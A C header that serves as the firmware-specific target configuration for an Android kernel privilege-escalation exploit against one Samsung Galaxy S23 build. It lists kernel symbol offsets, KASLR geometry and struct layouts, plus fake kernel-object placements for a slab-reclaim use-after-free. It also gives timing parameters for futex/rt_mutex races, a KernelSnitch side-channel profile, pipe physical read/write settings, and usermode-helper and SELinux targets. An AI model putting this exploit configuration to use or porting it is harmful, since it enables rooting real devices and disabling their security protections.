#ifndef OSS_PAYLOAD_TARGET_H
#define OSS_PAYLOAD_TARGET_H

/*
 * Firmware contract for SM-S918B / S911U1UES6DYI3.
 *
 * This is the only source file allowed to contain firmware identity, kernel
 * symbol offsets, kernel ABI layouts, virtual-address geometry, exploit
 * object geometry, and device-calibrated reclaim/timing parameters. Generic
 * payload modules consume TARGET_* names and must not carry firmware literals.
 *
 * Symbol offsets are relative to TARGET_KIMAGE_TEXT_BASE. Runtime code adds
 * only the KASLR slide discovered during the current boot.
 */

/* Exact target identity. */
#define TARGET_NAME "dyi3"
#define TARGET_MODEL "SM-S911U1"
#define TARGET_DEVICE "dm1q"
#define TARGET_BUILD "S911U1UES6DYI3"
#define TARGET_FINGERPRINT \
  "samsung/dm1quew/dm1q:15/AP3A.240905.015.A2/S911U1UES6DYI3:user/release-keys"
#define TARGET_KERNEL_RELEASE \
  "5.15.153-android13-8-30958972-abS911U1UES6DYI3"

/* Static kernel symbols. */
#define TARGET_KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define TARGET_WORKER_THREAD_OFF 0x0010d2f8ULL
#define TARGET_WORKER_CALLER_OFF 0x0010d370ULL
#define TARGET_INIT_TASK_OFF 0x02ac9bc0ULL
#define TARGET_ROOT_TASK_GROUP_OFF 0x02b79ac0ULL
#define TARGET_ASHMEM_MISC_FOPS_OFF 0x02ac1b88ULL
#define TARGET_ASHMEM_FOPS_OFF 0x01f211d0ULL
#define TARGET_ASHMEM_IOCTL_OFF 0x010b5de0ULL
#define TARGET_ASHMEM_COMPAT_IOCTL_OFF 0x010b643cULL
#define TARGET_ASHMEM_MMAP_OFF 0x010b6494ULL
#define TARGET_ASHMEM_OPEN_OFF 0x010b6774ULL
#define TARGET_ASHMEM_RELEASE_OFF 0x010b680cULL
#define TARGET_ASHMEM_SHOW_FDINFO_OFF 0x010b6928ULL
#define TARGET_CONFIGFS_READ_ITER_OFF 0x005d30a8ULL
#define TARGET_CONFIGFS_BIN_WRITE_ITER_OFF 0x005d3ad0ULL
#define TARGET_GENERIC_FILE_SPLICE_READ_OFF 0x00523f70ULL
#define TARGET_MEMSTART_ADDR_OFF 0x01f77a80ULL
#define TARGET_KIMAGE_VOFFSET_OFF 0x01f77a88ULL
#define TARGET_KMALLOC_CACHES_OFF 0x01f77a90ULL
#define TARGET_ANON_PIPE_BUF_OPS_OFF 0x01da30a0ULL
#define TARGET_CALL_USERMODEHELPER_EXEC_WORK_OFF 0x00103e50ULL
#define TARGET_DO_SAK_WORK_OFF 0x00b29b68ULL
#define TARGET_DO_SAK_OFF 0x00b2c310ULL
#define TARGET_SELINUX_STATE_ENFORCING_OFF 0x02c4e438ULL

/* Kernel address-space and KASLR geometry. */
#define TARGET_PAGE_SIZE 0x1000ULL
#define TARGET_PAGE_MASK (TARGET_PAGE_SIZE - 1ULL)
#define TARGET_KERNEL_IMAGE_SPAN 0x04000000ULL
#define TARGET_LINEAR_MAP_BASE 0xffffff8000000000ULL
#define TARGET_LINEAR_MAP_END 0xffffff9000000000ULL
#define TARGET_VMEMMAP_START 0xfffffffe00000000ULL
#define TARGET_VMEMMAP_END 0xfffffffe40000000ULL
#define TARGET_KASLR_MAX_SLIDE 0x1f8000ULL
#define TARGET_KASLR_ALIGNMENT 0x8000ULL
#define TARGET_KASLR_CANDIDATE_COUNT 64U
#define TARGET_KASLR_QUORUM 2U
#define TARGET_TRACE_SCHED_BLOCKED_REASON_ID 108U
#define TARGET_TRACE_CALLER_OFF 0x10U
#define TARGET_TRACE_LOOSE_RECORD_SIZE 0x18U
#define TARGET_TRACE_TYPE_LEN_MASK 0x1fU
#define TARGET_MM_CACHE_NAME "mm_struct"
#define TARGET_SKB_CACHE_NAME "skbuff_head_cache"
#define TARGET_KMALLOC_4K_CACHE_NAME "kmalloc-4k"

/* BTF-derived kernel ABI. */
#define TARGET_STRUCT_PAGE_SIZE 0x40ULL
#define TARGET_PAGE_COMPOUND_HEAD_OFF 0x08ULL
#define TARGET_PAGE_SLAB_CACHE_OFF 0x18ULL
#define TARGET_KMEM_CACHE_DESC_SIZE 264U
#define TARGET_KMEM_CACHE_SIZE_OFF 24U
#define TARGET_KMEM_CACHE_OBJECT_SIZE_OFF 28U
#define TARGET_KMEM_CACHE_INUSE_OFF 80U
#define TARGET_KMEM_CACHE_ALIGN_OFF 84U
#define TARGET_KMEM_CACHE_USEROFFSET_OFF 244U
#define TARGET_KMEM_CACHE_USERSIZE_OFF 248U
#define TARGET_TASK_TASKS_OFF 0x4d0ULL
#define TARGET_TASK_PID_OFF 0x5d8ULL
#define TARGET_TASK_COMM_OFF 0x7a8ULL
#define TARGET_TASK_FILES_OFF 0x7d8ULL
#define TARGET_TASK_CACHE_SIZE 4608U
#define TARGET_FILES_FDT_OFF 0x20ULL
#define TARGET_FILES_CACHE_SIZE 704U
#define TARGET_FDTABLE_MAX_FDS_OFF 0x00ULL
#define TARGET_FDTABLE_FD_OFF 0x08ULL
#define TARGET_FILE_PRIVATE_DATA_OFF 0xd8ULL
#define TARGET_FILE_CACHE_SIZE 320U
#define TARGET_PIPE_HEAD_OFF 0x60ULL
#define TARGET_PIPE_TAIL_OFF 0x64ULL
#define TARGET_PIPE_RING_SIZE_OFF 0x6cULL
#define TARGET_PIPE_BUFS_OFF 0xa8ULL
#define TARGET_PIPE_BUFFER_PAGE_OFF 0x00ULL
#define TARGET_PIPE_BUFFER_OPS_OFF 0x10ULL
#define TARGET_PIPE_BUFFER_STRIDE 0x28ULL
#define TARGET_TTY_FILE_TTY_OFF 0x00ULL
#define TARGET_TTY_FILE_FILE_OFF 0x08ULL
#define TARGET_TTY_MAGIC_OFF 0x00ULL
#define TARGET_TTY_OPS_OFF 0x18ULL
#define TARGET_TTY_INDEX_OFF 0x20ULL
#define TARGET_TTY_SAK_WORK_OFF 0x2f8ULL
#define TARGET_TTY_PORT_OFF 0x328ULL
#define TARGET_TTY_OPS_SIZE 0x118U
#define TARGET_TTY_OPS_FLUSH_BUFFER_OFF 0xa8U
#define TARGET_WORK_DATA_OFF 0x00U
#define TARGET_WORK_ENTRY_OFF 0x08U
#define TARGET_WORK_FUNC_OFF 0x18U
#define TARGET_TTY_MAGIC 0x5401U

/* file_operations layout for this kernel build. */
#define TARGET_FOPS_OWNER_OFF 0x00U
#define TARGET_FOPS_LLSEEK_OFF 0x08U
#define TARGET_FOPS_READ_OFF 0x10U
#define TARGET_FOPS_WRITE_OFF 0x18U
#define TARGET_FOPS_READ_ITER_OFF 0x20U
#define TARGET_FOPS_WRITE_ITER_OFF 0x28U
#define TARGET_FOPS_IOCTL_OFF 0x50U
#define TARGET_FOPS_COMPAT_IOCTL_OFF 0x58U
#define TARGET_FOPS_MMAP_OFF 0x60U
#define TARGET_FOPS_OPEN_OFF 0x70U
#define TARGET_FOPS_RELEASE_OFF 0x80U
#define TARGET_FOPS_SPLICE_READ_OFF 0xc8U
#define TARGET_FOPS_SHOW_FDINFO_OFF 0xe0U
#define TARGET_FAKE_FOPS_POPULATED_SIZE 0xe8U

/* Reclaimed order-3 object and fake kernel-object geometry. */
#define TARGET_MM_SLAB_ORDER 3U
#define TARGET_MM_STRUCT_SIZE 0x400U
#define TARGET_ORDER3_SIZE (TARGET_PAGE_SIZE << TARGET_MM_SLAB_ORDER)
#define TARGET_MM_OBJECTS_PER_SLAB \
  (TARGET_ORDER3_SIZE / TARGET_MM_STRUCT_SIZE)
#define TARGET_MM_PAGES_PER_SLAB (1U << TARGET_MM_SLAB_ORDER)
#define TARGET_RECLAIM_BUFFER_SIZE 0x8e80U
#define TARGET_PRIMARY_FOPS_LIVE_OFF 0x1260ULL
#define TARGET_PRIMARY_FOPS_BUFFER_OFF 0x20e0U
#define TARGET_RECOVERY_FOPS_LIVE_OFF 0x1660ULL
#define TARGET_RECOVERY_FOPS_BUFFER_OFF 0x24e0U
#define TARGET_LIVE_TO_BUFFER_DELTA 0xe80U
#define TARGET_FAKE_LOCK_OFF 0x2210U
#define TARGET_FAKE_LOCK_WAITERS_ROOT_OFF 0x2218U
#define TARGET_FAKE_LOCK_WAITERS_LEFTMOST_OFF 0x2220U
#define TARGET_FAKE_LOCK_OWNER_OFF 0x2228U
#define TARGET_FAKE_WAITER_OFF 0x2350U
#define TARGET_FAKE_WAITER_SIZE 0x58U
#define TARGET_FAKE_TASK_OFF 0x3200U
#define TARGET_FAKE_RB_RIGHT_OFF 0x4440U
#define TARGET_FAKE_RB_LEFT_OFF 0x5550U
#define TARGET_LOCK_WAITERS_SELF_LIVE_OFF 0x14d0ULL
#define TARGET_PI_WAITERS_SELF_LIVE_OFF 0x14e8ULL
#define TARGET_WAITER_LOCK_LIVE_OFF 0x1390ULL
#define TARGET_SIGNAL_SCRATCH_LIVE_OFF 0x2380ULL
#define TARGET_FAKE_WAITER_PRIO 0x82U
#define TARGET_FAKE_TASK_USAGE_OFF 0x38U
#define TARGET_FAKE_TASK_PRIO_OFF 0x7cU
#define TARGET_FAKE_TASK_NORMAL_PRIO_OFF 0x84U
#define TARGET_FAKE_TASK_TASK_GROUP_OFF 0x400U
#define TARGET_FAKE_TASK_PI_LOCK_OFF 0x884U
#define TARGET_FAKE_TASK_PI_WAITERS_OFF 0x898U
#define TARGET_FAKE_TASK_PI_WAITERS_LEFTMOST_OFF 0x8a0U
#define TARGET_FAKE_TASK_PI_TOP_TASK_OFF 0x8a8U
#define TARGET_FAKE_TASK_PI_BLOCKED_ON_OFF 0x8b0U
#define TARGET_FAKE_TASK_USAGE 0x100U
#define TARGET_FAKE_TASK_PRIO 0x78U
#define TARGET_RB_PARENT_OFF 0x00U
#define TARGET_RB_RIGHT_OFF 0x08U
#define TARGET_RB_LEFT_OFF 0x10U

/* rt_mutex_waiter and signal-frame payload ABI. */
#define TARGET_RT_WAITER_TREE_PARENT_OFF 0x00U
#define TARGET_RT_WAITER_TREE_RIGHT_OFF 0x08U
#define TARGET_RT_WAITER_TREE_LEFT_OFF 0x10U
#define TARGET_RT_WAITER_PI_PARENT_OFF 0x18U
#define TARGET_RT_WAITER_PI_RIGHT_OFF 0x20U
#define TARGET_RT_WAITER_PI_LEFT_OFF 0x28U
#define TARGET_RT_WAITER_TASK_OFF 0x30U
#define TARGET_RT_WAITER_LOCK_OFF 0x38U
#define TARGET_RT_WAITER_WAKE_STATE_OFF 0x40U
#define TARGET_RT_WAITER_PRIO_OFF 0x44U
#define TARGET_RT_WAITER_DEADLINE_OFF 0x48U
#define TARGET_RT_WAITER_WW_CTX_OFF 0x50U
#define TARGET_SIGNAL_PAYLOAD_SIZE 0x200U
#define TARGET_SIGNAL_RB_PARENT_OFF 0x18U
#define TARGET_SIGNAL_RB_RIGHT_OFF 0x20U
#define TARGET_SIGNAL_RB_LEFT_OFF 0x28U
#define TARGET_SIGNAL_PI_WAITERS_OFF 0x30U
#define TARGET_SIGNAL_ZERO_0_OFF 0x38U
#define TARGET_SIGNAL_ZERO_1_OFF 0x40U
#define TARGET_SIGNAL_SCRATCH_PTR_OFF 0x48U
#define TARGET_SIGNAL_WAITER_LOCK_OFF 0x50U
#define TARGET_SIGNAL_RB_TAG_OFF 0x58U
#define TARGET_SIGNAL_ZERO_2_OFF 0x60U
#define TARGET_SIGNAL_ZERO_3_OFF 0x68U
#define TARGET_SIGNAL_RB_TAG 0x8200000000ULL

/* Selected futex-v14 route state layout and calibrated spin limits. */
#define TARGET_FUTEX_V14_STATE_BASE_OFF 0x730U
#define TARGET_FUTEX_V14_WAITER_TID_OFF 0x730U
#define TARGET_FUTEX_V14_ROUTE_DONE_OFF 0x734U
#define TARGET_FUTEX_V14_PI_CHAIN_OFF 0x738U
#define TARGET_FUTEX_V14_WAITER_READY_OFF 0x73cU
#define TARGET_FUTEX_V14_OWNER_STARTED_OFF 0x740U
#define TARGET_FUTEX_V14_WAITER_WAITING_OFF 0x744U
#define TARGET_FUTEX_V14_WAIT_OFF 0x748U
#define TARGET_FUTEX_V14_PI_TARGET_OFF 0x74cU
#define TARGET_FUTEX_V14_SCHED_DONE_OFF 0x750U
#define TARGET_FUTEX_V14_GATE_OFF 0x754U
#define TARGET_FUTEX_V14_OWNER_ACQUIRED_OFF 0x758U
#define TARGET_FUTEX_V14_ATTEMPT_COUNT_OFF 0x75cU
#define TARGET_FUTEX_V14_SUCCESS_COUNT_OFF 0x760U
#define TARGET_FUTEX_V14_STOP_OFF 0x764U
#define TARGET_FUTEX_V14_DELAY_US_OFF 0x768U
#define TARGET_FUTEX_V14_STATE_OFF 0x76cU
#define TARGET_FUTEX_V14_SECONDARY_0_OFF 0x770U
#define TARGET_FUTEX_V14_SECONDARY_1_OFF 0x774U
#define TARGET_FUTEX_LONG_SPIN_MAX 0x3b9ac9ffULL
#define TARGET_FUTEX_SHORT_SPIN_MAX 0x05f5e0ffULL
#define TARGET_FUTEX_INITIAL_DELAY_US 50000
#define TARGET_FUTEX_WAIT_SEC 8
#define TARGET_FUTEX_POLL_USEC 1000
#define TARGET_FUTEX_PAUSE_USEC 100000
#define TARGET_FUTEX_LONG_PAUSE_USEC 300000
#define TARGET_FUTEX_HANDSHAKE_SPINS 20000
#define TARGET_FUTEX_OWNER_SPINS 2000
#define TARGET_FUTEX_READY_TIMEOUT_MS 5000
#define TARGET_FUTEX_RETRY_USEC 10000
#define TARGET_FUTEX_LEGACY_POLL_COUNT 1000
#define TARGET_FUTEX_DELAY_TABLE {0, 16, 32, 48, 64, 96, 128, 24}
#define TARGET_ATTEMPT_DELAY_COUNT 8U
#define TARGET_ATTEMPT_DELAYS_USEC \
  {5000, 0, 10000, 30000, -5000, 20000, 15000, 25000}

/* ConfigFS/ashmem primitive ABI and exact strscpy behavior. */
#define TARGET_ASHMEM_PATH_SIZE 0x100U
#define TARGET_ASHMEM_NAME_LEN 0x100U
#define TARGET_ASHMEM_SET_NAME_IOCTL 0x41007701UL
#define TARGET_CONFIGFS_CONTROL_LEN 0x80U
#define TARGET_CONFIGFS_COUNT 0x6d6873612f766564ULL
#define TARGET_STRSCPY_WORD_SIZE 8U
#define TARGET_CONFIGFS_PAGE_CONTROL_OFF 0x05U
#define TARGET_CONFIGFS_READ_STATE_OFF 0x15U
#define TARGET_CONFIGFS_READ_STATE_LEN 0x31U
#define TARGET_CONFIGFS_WRITE_STATE_OFF 0x15U
#define TARGET_CONFIGFS_WRITE_STATE_LEN 0x48U
#define TARGET_CONFIGFS_ADDR_LOW_MASK 0xffffffULL
#define TARGET_CONFIGFS_READ_ZERO_LEN 0x34U
#define TARGET_CONFIGFS_WRITE_ZERO_LEN 0x38U
#define TARGET_CONFIGFS_WRITE_HIGH_OFF 0x4dU
#define TARGET_CONFIGFS_WRITE_END_OFF 0x55U
#define TARGET_CONFIGFS_WRITE_ZERO_OFF 0x59U
#define TARGET_CONFIGFS_SCRATCH_LIVE_OFF 0x2180ULL

/* Device-calibrated reclaim and KernelSnitch profile. */
#define TARGET_MM_PARTIALS 5U
#define TARGET_KSNITCH_COLLISIONS 4U
#define TARGET_KSNITCH_REPEAT_GROOM 64U
#define TARGET_KSNITCH_APPENDED_GROOM 512U
#define TARGET_KSNITCH_REPEAT_PIPE 128U
#define TARGET_KSNITCH_APPENDED_PIPE 2048U
#define TARGET_KSNITCH_AVERAGE 8U
#define TARGET_KSNITCH_IDENTITY_START TARGET_LINEAR_MAP_BASE
#define TARGET_KSNITCH_IDENTITY_SIZE (64ULL << 30)
#define TARGET_KSNITCH_APPENDED_DEFAULT 4096U
#define TARGET_KSNITCH_COLLISION_CONFIRMATIONS 3U
#define TARGET_KSNITCH_THRESHOLD_MULT 10U
#define TARGET_KSNITCH_PAR_SCREEN_SAMPLES 8U
#define TARGET_KSNITCH_PAR_CONFIRM_SAMPLES 24U
#define TARGET_KSNITCH_PAR_BASELINE_SAMPLES 32U
#define TARGET_KSNITCH_WAITER_STACK (128U * 1024U)
#define TARGET_SKB_RECLAIM_SENDS 64
#define TARGET_SKB_RECLAIM_MIN_FULL 48
#define TARGET_RECLAIM_QUIET_SAMPLE_MS 25
#define TARGET_RECLAIM_QUIET_STREAK 3
#define TARGET_RECLAIM_QUIET_MAX_SAMPLES 40

/* Pipe physical R/W profile. */
#define TARGET_PIPE_COUNT 240
#define TARGET_PIPE_SLOTS 32
#define TARGET_PIPE_OBJECT_SIZE 0x800U
#define TARGET_PIPE_CAN_MERGE 0x10U
#define TARGET_PIPE_SCAN_CHUNK 0x400U
#define TARGET_PIPE_ATTEMPTS 12
#define TARGET_PIPE_PREPARE_TIMEOUT_MS 20000
#define TARGET_PIPE_INSTALL_TIMEOUT_MS 120000
#define TARGET_PIPE_IO_TIMEOUT_MS 1000
#define TARGET_PIPE_MAX_SLABS (TARGET_ORDER3_SIZE / TARGET_PAGE_SIZE)
/* kmalloc_caches is [NR_KMALLOC_TYPES][TARGET_KMALLOC_BUCKETS]; the row index
 * is the BTF enum kmalloc_cache_type, which the contract derives per firmware.
 * TARGET_KMALLOC_NORMAL_2K_SLOT is the 2 KiB bucket (KMALLOC_PIPE_INDEX) in
 * the NORMAL row, and the cgroup slot is that bucket in the CGROUP row. */
#define TARGET_KMALLOC_TYPES 3U
#define TARGET_KMALLOC_CGROUP_TYPE 1U
#define TARGET_KMALLOC_BUCKETS 14U
#define TARGET_KMALLOC_NORMAL_2K_SLOT 11U
#define TARGET_KMALLOC_CGROUP_2K_SLOT 25U
#define TARGET_KMALLOC_CACHE_SLOTS 42U
#define TARGET_PIPE_PROOF_LIVE_OFF 0x7100ULL
#define TARGET_FAKE_KMEM_CACHE_LIVE_OFF 0x7400ULL

/* UMH/PTY object placement and ABI. */
#define TARGET_ROOT_UMH_DATA_LIVE_OFF 0x6200ULL
#define TARGET_ROOT_TTY_OPS_LIVE_OFF 0x6400ULL
#define TARGET_WORK_PENDING_BIT 0x1ULL
#define TARGET_UMH_SUBPROCESS_INFO_SIZE 112U
#define TARGET_UMH_SUBPROCESS_WORK_SIZE 48U
#define TARGET_UMH_SUBPROCESS_COMPLETE_OFF 48U
#define TARGET_UMH_COMPLETION_SIZE 32U

#endif
